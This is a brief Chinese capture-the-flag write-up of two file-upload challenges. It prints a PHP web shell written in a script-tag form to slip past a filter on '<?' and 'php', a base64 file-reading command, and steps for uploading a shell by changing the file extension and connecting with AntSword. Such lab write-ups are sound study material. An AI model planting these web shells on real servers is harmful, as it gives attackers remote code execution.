“百度杯”CTF比赛 2017 九月场-upload
题目描述
1 | 想怎么传就怎么传,就是这么任性。 |
过滤了<?
和php
使用<script language='PhP'>@eval($_POST['cmd']);</script>
读取flag即可,有时候system函数无回显可以加上base64cmd=system("cat ../flag.php | base64");
然后解码即可
第三届“百越杯”福建省高校网络空间安全大赛-Do you know upload?
首先文件上传,抓包改后缀即可,然后发现没有flag!!!
但是读取config.php的时候
1 |
|
然后通过蚁剑连接数据库,获得flag